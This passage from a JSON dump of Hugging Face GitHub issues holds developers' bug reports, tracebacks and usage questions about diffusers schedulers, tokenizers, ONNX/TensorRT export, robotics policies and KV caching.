robots?", "body": "Huge thanks for making all of this available!\r\n\r\nCan you recommend any (low-cost) off-the-shelf robots to work with?", "url": "https://github.com/huggingface/lerobot/issues/413", "state": "closed", "labels": [ "question" ], "created_at": "2024-09-05T10:21:24Z", "updated_at": "2025-10-08T08:27:56Z", "user": "danielfriis" }, { "repo": "huggingface/diffusers", "number": 9362, "title": "IndexError: index 29 is out of bounds for dimension 0 with size 29", "body": "### Describe the bug\r\n\r\nI have three problems with the same root cause. \r\n1) TypeError: unsupported operand type(s) for +=: 'NoneType' and 'int'\r\n # upon completion increase step index by one\r\n self._step_index += 1 <---Error [here](https://github.com/huggingface/diffusers/blob/main/src/diffusers/schedulers/scheduling_flow_match_euler_discrete.py#L303)\r\n2) IndexError: index 29 is out of bounds for dimension 0 with size 29\r\n sigma_next = self.sigmas[self.step_index + 1] <--- Error [here](https://github.com/huggingface/diffusers/blob/main/src/diffusers/schedulers/scheduling_flow_match_euler_discrete.py#L295)\r\n3) RuntimeError: Already borrowed\r\n if _truncation is not None:\r\n self._tokenizer.no_truncation() <--- Error here\r\n Example: https://github.com/huggingface/tokenizers/issues/537\r\nThe reason, as I understand it, is threads. 
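If concurrent requests share one pipeline, the scheduler's per-call state (such as `_step_index`) is mutated by every request, which matches all three symptoms. A minimal mitigation sketch (hypothetical, not a diffusers API) is to serialize access:

```python
import threading

# Hypothetical guard: diffusers pipelines and schedulers keep per-call state
# (e.g. _step_index), so a single shared pipeline must not run two
# generations at once. Serialize calls with a lock.
pipeline_lock = threading.Lock()

def generate_image_safely(pipeline, prompt, **kwargs):
    with pipeline_lock:  # one request at a time mutates scheduler state
        return pipeline(prompt, **kwargs).images[0]
```

An alternative is to give each worker thread its own pipeline, or at least its own scheduler instance.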
Do you know, how can I solve this problem?\r\n\r\n### Reproduction\r\n```\r\nfrom diffusers import (\r\n FluxPipeline,\r\n FlowMatchEulerDiscreteScheduler,\r\n)\r\nimport torch\r\n\r\npipeline = FluxPipeline.from_pretrained(\r\n \"black-forest-labs/FLUX.1-schnell\", torch_dtype=torch.bfloat16\r\n).to(\"cuda\")\r\n\r\nseed = 42\r\nheight = 720\r\nwidth = 1280\r\n\r\ngenerator = torch.Generator(device=\"cuda\").manual_seed(seed)\r\n\r\npipeline(\r\n prompt=prompt + \", highly detailed, all is depicted as silhouettes, without words\",\r\n guidance_scale=0.,\r\n # num_inference_steps=10,\r\n height=height,\r\n width=width,\r\n generator=generator,\r\n max_sequence_length=256,\r\n).images[0]\r\n```\r\n### Logs\r\n\r\n```shell\r\nFor example:\r\n Traceback (most recent call last):\r\n File \"/opt/conda/lib/python3.10/site-packages/flask/app.py\", line 1473, in wsgi_app\r\n response = self.full_dispatch_request()\r\n File \"/opt/conda/lib/python3.10/site-packages/flask/app.py\", line 882, in full_dispatch_request\r\n rv = self.handle_user_exception(e)\r\n File \"/opt/conda/lib/python3.10/site-packages/flask/app.py\", line 880, in full_dispatch_request\r\n rv = self.dispatch_request()\r\n File \"/opt/conda/lib/python3.10/site-packages/flask/app.py\", line 865, in dispatch_request\r\n return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]\r\n File \"/app/main.py\", line 29, in generate_image\r\n image = imagegen.run(**data)\r\n File \"/app/image_generator.py\", line 102, in run\r\n return generate_image()\r\n File \"/app/image_generator.py\", line 89, in generate_image\r\n return self.pipeline(\r\n File \"/opt/conda/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 115, in decorate_context\r\n return func(*args, **kwargs)\r\n File \"/opt/conda/lib/python3.10/site-packages/diffusers/pipelines/flux/pipeline_flux.py\", line 734, in __call__\r\n latents = self.scheduler.step(noise_pred, t, latents, return_dict=False)[0]\r\n File \"/opt/conda/lib/python3.10/site-packages/diffusers/schedulers/scheduling_flow_match_euler_discrete.py\", line 295, in step\r\n sigma_next = self.sigmas[self.step_index + 1]\r\nTypeError: unsupported operand type(s) for +: 'NoneType' and 'int'\r\n```\r\n\r\n\r\n### System Info\r\n\r\n\r\n- \ud83e\udd17 Diffusers version: 0.31.0.dev0\r\n- Platform: Linux-5.4.0-171-generic-x86_64-with-glibc2.35\r\n- Running on Google Colab?: No\r\n- Python version: 3.10.13\r\n- PyTorch version (GPU?): 2.2.1 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.24.6\r\n- Transformers version: 4.44.2\r\n- Accelerate version: 0.34.0\r\n- PEFT version: 0.12.0\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.4\r\n- xFormers version: not installed\r\n- Accelerator: NVIDIA RTX A6000, 46068 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n### Who can help?\r\n\r\n@yiyixuxu @sayakpaul @DN6", "url": "https://github.com/huggingface/diffusers/issues/9362", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-09-04T11:02:49Z", "updated_at": "2024-11-25T15:04:22Z", "comments": 8, "user": "Anvarka" }, { "repo": "huggingface/tokenizers", "number": 1627, "title": "Rust: How to handle models with `precompiled_charsmap = null`", "body": "Hi guys,\r\nI'm currently working on https://github.com/supabase/edge-runtime/pull/368 that pretends to add a rust implementation of 
`pipeline()`. \r\n\r\nWhile I was coding the `translation` task, I found that I can't load the `Tokenizer` instance for the [Xenova/opus-mt-en-fr](https://huggingface.co/Xenova/opus-mt-en-fr) `onnx` model and the other `opus-mt-*` variants. \r\n
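One pre-patch workaround sketch for the null `precompiled_charsmap` failure shown in the trace below (hypothetical: it assumes dropping the empty `Precompiled` normalizer entry does not change tokenization for these models, which should be verified):

```python
import json

# Strip normalizer entries whose precompiled_charsmap is null before handing
# tokenizer.json to the Rust crate (hypothetical workaround sketch).
with open("opus-mt-en-fr/tokenizer.json", encoding="utf-8") as f:
    config = json.load(f)

normalizer = config.get("normalizer") or {}
if normalizer.get("type") == "Sequence":
    normalizer["normalizers"] = [
        n for n in normalizer["normalizers"]
        if not (n.get("type") == "Precompiled" and n.get("precompiled_charsmap") is None)
    ]

with open("opus-mt-en-fr/tokenizer.patched.json", "w", encoding="utf-8") as f:
    json.dump(config, f, ensure_ascii=False)
```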
\r\nI got the following:\r\n\r\n```rust\r\nlet tokenizer_path = Path::new(\"opus-mt-en-fr/tokenizer.json\");\r\nlet tokenizer = Tokenizer::from_file(tokenizer_path).unwrap();\r\n```\r\n\r\n```\r\nthread 'main' panicked at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/normalizers/mod.rs:143:26:\r\nPrecompiled: Error(\"invalid type: null, expected a borrowed string\", line: 1, column: 28)\r\nstack backtrace:\r\n 0: rust_begin_unwind\r\n at /rustc/80eb5a8e910e5185d47cdefe3732d839c78a5e7e/library/std/src/panicking.rs:662:5\r\n 1: core::panicking::panic_fmt\r\n at /rustc/80eb5a8e910e5185d47cdefe3732d839c78a5e7e/library/core/src/panicking.rs:74:14\r\n 2: core::result::unwrap_failed\r\n at /rustc/80eb5a8e910e5185d47cdefe3732d839c78a5e7e/library/core/src/result.rs:1679:5\r\n 3: core::result::Result::expect\r\n at /rustc/80eb5a8e910e5185d47cdefe3732d839c78a5e7e/library/core/src/result.rs:1059:23\r\n 4: ::deserialize\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/normalizers/mod.rs:139:25\r\n 5: as serde::de::Visitor>::visit_some\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde-1.0.207/src/de/impls.rs:916:9\r\n 6: <&mut serde_json::de::Deserializer as serde::de::Deserializer>::deserialize_option\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde_json-1.0.124/src/de.rs:1672:18\r\n 7: serde::de::impls::>::deserialize\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde-1.0.207/src/de/impls.rs:935:9\r\n 8: as serde::de::DeserializeSeed>::deserialize\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde-1.0.207/src/de/mod.rs:801:9\r\n 9: as serde::de::MapAccess>::next_value_seed\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde_json-1.0.124/src/de.rs:2008:9\r\n 10: serde::de::MapAccess::next_value\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde-1.0.207/src/de/mod.rs:1874:9\r\n 11: as serde::de::Visitor>::visit_map\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/tokenizer/serialization.rs:132:55\r\n 12: <&mut serde_json::de::Deserializer as serde::de::Deserializer>::deserialize_struct\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde_json-1.0.124/src/de.rs:1840:31\r\n 13: tokenizers::tokenizer::serialization::>::deserialize\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/tokenizer/serialization.rs:62:9\r\n 14: ::deserialize::__Visitor as serde::de::Visitor>::visit_newtype_struct\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/tokenizer/mod.rs:408:21\r\n 15: <&mut serde_json::de::Deserializer as serde::de::Deserializer>::deserialize_newtype_struct\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde_json-1.0.124/src/de.rs:1723:9\r\n 16: tokenizers::tokenizer::_::::deserialize\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/tokenizer/mod.rs:408:21\r\n 17: serde_json::de::from_trait\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde_json-1.0.124/src/de.rs:2478:22\r\n 18: serde_json::de::from_str\r\n at /home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde_json-1.0.124/src/de.rs:2679:5\r\n 19: tokenizers::tokenizer::Tokenizer::from_file\r\n at 
/home/kalleby/.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokenizers-0.20.0/src/tokenizer/mod.rs:439:25\r\n 20: transformers_rs::pipeline::tasks::seq_to_seq::seq_to_seq\r\n at ./src/pipeline/tasks/seq_to_seq.rs:51:21\r\n 21: app::main\r\n at ./examples/app/src/main.rs:78:5\r\n 22: core::ops::function::FnOnce::call_on", "url": "https://github.com/huggingface/tokenizers/issues/1627", "state": "open", "labels": [ "Feature Request" ], "created_at": "2024-09-04T08:33:06Z", "updated_at": "2024-10-06T15:34:06Z", "user": "kallebysantos" }, { "repo": "huggingface/optimum", "number": 2013, "title": "Is it possible to convert decoder_model_merged.onnx to TensorRT via the trtexec command?", "body": "First, I converted whisper-tiny to ONNX via optimum-cli:\r\n`optimum-cli export onnx --model openai/whisper-tiny --task automatic-speech-recognition-with-past whisper-tiny-onnx`\r\n\r\nI got the config, encoder, and decoder_merged models.\r\n\r\nThen I took the encoder and decoder_merged to convert to TensorRT via NGC version 23.09-py3; the encoder was no problem, but decoder_merged hit a problem while converting:\r\n`trtexec --onnx=/workspace/models/whisper-tiny-onnx/decoder_model_merged.onnx --saveEngine=/workspace/models/whisper-tiny-onnx/decoder_model_merged.plan`\r\nThe error:\r\n`[5] Assertion failed: (node.output().size() <= static_cast(outputs.size())) && \"Node has more output tensors than TRT expected.\"`\r\n\r\n![Screenshot 2024-09-04 005124](https://github.com/user-attachments/assets/c289f1fa-2174-4d8a-af68-ee9758a77c54)\r\n\r\n\r\nCan someone help me with this, or is there a better-practice approach? Please...", "url": "https://github.com/huggingface/optimum/issues/2013", "state": "closed", "labels": [], "created_at": "2024-09-03T17:52:40Z", "updated_at": "2024-09-15T10:16:34Z", "comments": 3, "user": "ccyrene" }, { "repo": "huggingface/lerobot", "number": 407, "title": "Multi-Image support for VQ-BeT", "body": "Hello, I wanted to ask if there is a possibility to have VQ-BeT running on multiple cameras for environments that have different views, like Robomimic? If so, can someone give me pointers on what exactly I need to change? I would be happy to submit a PR once I get it working on my side and get past the ICLR deadline! \r\n\r\nCurrently, if I understand correctly, we need to change the `VQBeTRgbEncoder`; it seems like it supports multiple camera views, but there is an [assert statement](https://github.com/huggingface/lerobot/blob/27ba2951d128a3db2497d1337031e01fb995ccfe/lerobot/common/policies/vqbet/modeling_vqbet.py#L745) that checks that the number of image views is 1. Is there a specific reason for this assert statement, i.e., do I need to change something else? 
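A hedged sketch of what lifting that restriction might look like (hypothetical and simplified; the real `VQBeTRgbEncoder` interface may differ):

```python
import torch
import torch.nn as nn

class MultiViewRgbEncoder(nn.Module):
    """Hypothetical sketch: encode each camera view with the existing
    single-view encoder and fuse the features, instead of asserting
    that exactly one view is present."""

    def __init__(self, single_view_encoder: nn.Module, num_views: int, feat_dim: int):
        super().__init__()
        self.encoder = single_view_encoder
        self.proj = nn.Linear(num_views * feat_dim, feat_dim)

    def forward(self, views: list[torch.Tensor]) -> torch.Tensor:
        feats = [self.encoder(v) for v in views]    # one (B, feat_dim) per camera
        return self.proj(torch.cat(feats, dim=-1))  # fuse back to (B, feat_dim)
```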
", "url": "https://github.com/huggingface/lerobot/issues/407", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2024-09-03T17:00:23Z", "updated_at": "2025-10-08T08:27:39Z", "user": "bkpcoding" }, { "repo": "huggingface/optimum", "number": 2009, "title": "[Feature request] Add kwargs or additional options for torch.onnx.export", "body": "### Feature request\n\nIn `optimum.exporters.onnx.convert import export_pytorch`, there could be an option to add additional kwargs to the function which could be passed to the torch.onnx.export function.\n\n### Motivation\n\nIf such an option possible or will this ruin any of the other features, or is there a reason why there is no option available as of yet?\n\n### Your contribution\n\nCould contribute if this doesn't ruin any other features, or the current feature.", "url": "https://github.com/huggingface/optimum/issues/2009", "state": "open", "labels": [ "onnx" ], "created_at": "2024-09-03T13:52:50Z", "updated_at": "2024-10-08T15:27:26Z", "comments": 0, "user": "martinkorelic" }, { "repo": "huggingface/speech-to-speech", "number": 74, "title": "How to integrate it with frontend", "body": "Hi, What steps should I follow to create a web app UI and integrate it?\r\n\r\nMany thanks for considering my request.", "url": "https://github.com/huggingface/speech-to-speech/issues/74", "state": "open", "labels": [], "created_at": "2024-09-03T12:18:52Z", "updated_at": "2024-09-03T13:52:08Z", "user": "shrinivasait" }, { "repo": "huggingface/diffusers", "number": 9356, "title": "pipeline_stable_diffusion_xl_adapter", "body": "### Describe the bug\n\nI want to rewrite the call function of the pipeline_stable_diffusion_xl_adapter. When I want to use the function prepare_ip_adapter_image_embeds, there is an error called \"AttributeError: 'NoneType' object has no attribute 'image_projection_layers'\". The error tells me that the attribution self.unet.encoder_hid_proj is 'NoneType'. The pre-trianed model is 'stabilityai/stable-diffusion-xl-base-1.0'. Is there anything wrong when I use it? Thank you.\n\n### Reproduction\n\nmodel_path = 'stabilityai/stable-diffusion-xl-base-1.0'\r\nadapter = T2IAdapter.from_pretrained(\"TencentARC/t2i-adapter-openpose-sdxl-1.0\",)\r\nscheduler = DDPMScheduler.from_pretrained(model_path, subfolder=\"scheduler\")\r\npipe = AdapterPosePipeline.from_pretrained(model_path, adapter=adapter, torch_dtype=torch.float16, variant=\"fp16\", scheduler=scheduler).to(device)\r\n\r\n image_embeds = self.prepare_ip_adapter_image_embeds(\r\n image,\r\n ip_adapter_image_embeds,\r\n device,\r\n batch_size * num_images_per_prompt,\r\n self.do_classifier_free_guidance,\r\n )\n\n### Logs\n\n```shell\nroot@autodl-container-9d8d46936f-161f523c:~/autodl-tmp/COMP5704_Pose_Driven/src# python run.py\r\n/root/miniconda3/lib/python3.12/site-packages/xformers/ops/fmha/flash.py:211: FutureWarning: `torch.library.impl_abstract` was renamed to `torch.library.register_fake`. Please use that instead; we will remove `torch.library.impl_abstract` in a future version of PyTorch.\r\n @torch.library.impl_abstract(\"xformers_flash::flash_fwd\")\r\n/root/miniconda3/lib/python3.12/site-packages/xformers/ops/fmha/flash.py:344: FutureWarning: `torch.library.impl_abstract` was renamed to `torch.library.register_fake`. 
Please use that instead; we will remove `torch.library.impl_abstract` in a future version of PyTorch.\r\n @torch.library.impl_abstract(\"xformers_flash::flash_bwd\")\r\n/root/miniconda3/lib/python3.12/site-packages/controlnet_aux/mediapipe_face/mediapipe_face_common.py:7: UserWarning: The module 'mediapipe' is not installed. The package will have limited functionality. Please install it using the command: pip install 'mediapipe'\r\n warnings.warn(\r\nLoading pipeline components...: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 7/7 [00:01<00:00, 4.87it/s]\r\n/root/miniconda3/lib/python3.12/site-packages/controlnet_aux/open_pose/body.py:34: FutureWarning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don't have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature.\r\n model_dict = util.transfer(self.model, torch.load(model_path))\r\n/root/miniconda3/lib/python3.12/site-packages/controlnet_aux/open_pose/hand.py:14: FutureWarning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don't have full control of the loaded file. 
Please open an issue on GitHub for any issues related to this experimental feature.\r\n model_dict = util.transfer(self.model, torch.load(model_path))\r\n/root/miniconda3/lib/python3.12/site-packages/controlnet_aux/open_pose/face.py:325: FutureWarning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling.", "url": "https://github.com/huggingface/diffusers/issues/9356", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-09-03T10:25:57Z", "updated_at": "2024-10-28T15:03:18Z", "comments": 6, "user": "Yuhan291" }, { "repo": "huggingface/diffusers", "number": 9352, "title": "Text generation?", "body": "Hi thanks for this great library!\r\n\r\nThere seems to be some diffusion models that generate text, instead of images. (For example, these two surveys: https://arxiv.org/abs/2303.06574, https://www.semanticscholar.org/paper/Diffusion-models-in-text-generation%3A-a-survey-Yi-Chen/41941f072db18972b610de9979e755afba35f11e). Therefore, it would be great if Diffusers could support this. \r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/9352", "state": "open", "labels": [ "wip" ], "created_at": "2024-09-03T06:54:38Z", "updated_at": "2024-11-23T04:57:37Z", "comments": 13, "user": "fzyzcjy" }, { "repo": "huggingface/speech-to-speech", "number": 71, "title": "How to run in ubuntu", "body": "I am trying to run it locally in my Ubuntu machine I have nvidia gpu and already setup CUDA.\r\n\r\n```\r\npython s2s_pipeline.py \\\r\n\t--recv_host 0.0.0.0 \\\r\n\t--send_host 0.0.0.0 \\\r\n\t--lm_model_name microsoft/Phi-3-mini-4k-instruct \\\r\n\t--init_chat_role system \\\r\n\t--stt_compile_mode reduce-overhead \\\r\n\t--tts_compile_mode default \r\n```\r\nThis is the command I passed in the terminal but I am getting Error like this\r\n\r\n```\r\n(venv) basal-desktop@basal-desktop:/media/basal-desktop/E/speech-to-speech$ python s2s_pipeline.py --recv_host 0.0.0.0 --send_host 0.0.0.0 --lm_model_name microsoft/Phi-3-mini-4k-instruct --init_chat_role system --stt_compile_mode reduce-overhead --tts_compile_mode default \r\n[nltk_data] Downloading package averaged_perceptron_tagger_eng to\r\n[nltk_data] /home/basal-desktop/nltk_data...\r\n[nltk_data] Package averaged_perceptron_tagger_eng is already up-to-\r\n[nltk_data] date!\r\nUsing cache found in /home/basal-desktop/.cache/torch/hub/snakers4_silero-vad_master\r\n2024-09-03 11:20:08,495 - STT.whisper_stt_handler - INFO - Warming up WhisperSTTHandler\r\nYou have passed task=transcribe, but also have set `forced_decoder_ids` to [[1, None], [2, 50360]] which creates a conflict. `forced_decoder_ids` will be ignored in favor of task=transcribe.\r\nThe attention mask is not set and cannot be inferred from input because pad token is same as eos token.As a consequence, you may observe unexpected behavior. 
Please pass your input's `attention_mask` to obtain reliable results.\r\n/tmp/tmp1sx5flzq/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp7dgszafh/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpgutcpzdq/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpxya7vifd/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpoxfa0b57/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp9sd15wgk/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpuimau_4j/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp2hzix58m/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmppnjhbdhp/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp2dvfaztp/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpaofqmu2k/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpcnc1scdn/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpnsf4b2jl/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpf_5rg_m_/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpnf8nvq6n/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp2f8iezjt/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp_om2_15p/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpc0t1q8vd/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpdsdc_2ef/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp7h6fpvoc/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmp4qfy9i7j/main.c:5:10: fatal error: Python.h: No such file or directory\r\n 5 | #include \r\n | ^~~~~~~~~~\r\ncompilation terminated.\r\n/tmp/tmpsjvhjzmz/main.c:5:10: fatal error: Py", "url": "https://github.com/huggingface/speech-to-speech/issues/71", "state": "closed", "labels": [], "created_at": "2024-09-03T06:02:45Z", "updated_at": "2024-10-01T07:45:20Z", "user": "Basal-Analytics" }, { "repo": "huggingface/optimum", "number": 2006, "title": "Support for gemma2-2b-it(gemma 2nd version) Model Export in Optimum for OpenVINO", "body": "### Feature request\n\n please provide Support for 
gemma2 Model Export in Optimum for OpenVINO\r\nversion: optimum 1.21.4\r\ntransformers: 4.43.4\n\n### Motivation\n\nI encountered an issue while trying to export a gemma2 model using the optimum library for ONNX export. The error message suggests that the gemma2 model is either a custom or unsupported architecture, and I need to provide a custom export configuration.\r\n\r\nError:\r\nraise ValueError(\r\nValueError: Trying to export a gemma2 model, that is a custom or unsupported architecture, but no custom export configuration was passed as `custom_export_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum-intel/issues if you would like the model type gemma2 to be supported natively in the OpenVINO export\n\n### Your contribution\n\nIt would be great if support for the gemma2 model could be added natively in the optimum library for OpenVINO export. Alternatively, detailed guidance on how to create a custom export configuration for this model would be appreciated.", "url": "https://github.com/huggingface/optimum/issues/2006", "state": "open", "labels": [ "onnx" ], "created_at": "2024-09-03T05:54:51Z", "updated_at": "2025-01-22T15:40:04Z", "comments": 2, "user": "chakka12345677" }, { "repo": "huggingface/transformers", "number": 33270, "title": "Static KV cache status: How to use it? Does it work for all models?", "body": "I see that there are many PRs about [StaticCache](https://github.com/huggingface/transformers/pulls?q=is%3Apr+StaticCache), but I couldn't find clear documentation on how to use it.\r\n\r\n#### What I want\r\n\r\n* To not have Transformers allocate memory dynamically for the KV cache when using `model.generate()`, as that leads to increased memory usage (due to garbage collection not happening fast/often enough) and worse performance.\r\n\r\n* To use that by default always, for every model, for every supported quantization backend (AutoAWQ, AutoGPTQ, AQLM, bitsandbytes, etc).\r\n\r\n#### Who can help?\r\n\r\nMaybe @gante ", "url": "https://github.com/huggingface/transformers/issues/33270", "state": "closed", "labels": [], "created_at": "2024-09-03T02:17:54Z", "updated_at": "2024-11-25T16:17:25Z", "user": "oobabooga" }, { "repo": "huggingface/transformers.js", "number": 917, "title": "Where should I get the `decoder_model_merged` file from?", "body": "### Question\n\nHey,\r\nI'm trying to use the `whisper-web` demo with my finetuned model.\r\nAfter I managed to connect my model to the demo application, I'm getting errors related to this:\r\n\r\nhttps://github.com/xenova/transformers.js/blob/7f5081da29c3f77ee830269ab801344776e61bcb/src/models.js#L771\r\n\r\nBasically, when `transformers.js` tries to load a whisper model, it looks for files called `decoder_model_merged.onnx` / `decoder_model_merged_quantized.onnx` / `decoder_model_merged_fp16.onnx`.\r\nThe thing is, the conversion script didn't create any of these files.\r\nThis is what the conversion script output looks like:\r\n![image](https://github.com/user-attachments/assets/f6288c77-5010-4d98-a609-f38e46e1afaa)\r\n\r\n\r\nPlease help me figure out what I am missing here.\r\nP.S. 
Once I get it to work, I'll be happy to open a PR on the `whisper-web` repository that will enable using local models together with remote (on the HF hub) models.\r\nThanks!", "url": "https://github.com/huggingface/transformers.js/issues/917", "state": "closed", "labels": [ "question" ], "created_at": "2024-09-02T07:30:57Z", "updated_at": "2025-02-26T12:05:05Z", "user": "abuchnick-aiola" }, { "repo": "huggingface/diffusers", "number": 9339, "title": "SD3 inpainting", "body": "I found the StableDiffusion3InpaintPipeline; where can I find the weights for SD3 inpainting?", "url": "https://github.com/huggingface/diffusers/issues/9339", "state": "closed", "labels": [ "stale" ], "created_at": "2024-09-02T05:00:19Z", "updated_at": "2024-10-02T15:43:24Z", "comments": 5, "user": "ucasyjz" }, { "repo": "huggingface/transformers", "number": 33232, "title": "How to use huggingface for training: google-t5/t5-base", "body": "### Feature request\r\n\r\nHow to use huggingface for training:\r\n https://github.com/huggingface/transformers/tree/main/examples/pytorch/translation\r\n\r\n# What is the format and how do I write it?\r\ndef batch_collator(data):\r\n print(data) # ???\r\n return {\r\n 'pixel_values': torch.stack([x for x in pixel_values]), \r\n 'labels': torch.tensor([x for x in labels]) \r\n }\r\n\r\ntrainer = Trainer(\r\n model=model,\r\n args=training_args,\r\n data_collator=batch_collator, # How should this be written?\r\n train_dataset=dataset['train'], \r\n)\r\n\r\n### Motivation\r\n\r\nNone\r\n\r\n### Your contribution\r\n\r\nNone\r\n\r\n\r\nI have already tried this and it works: 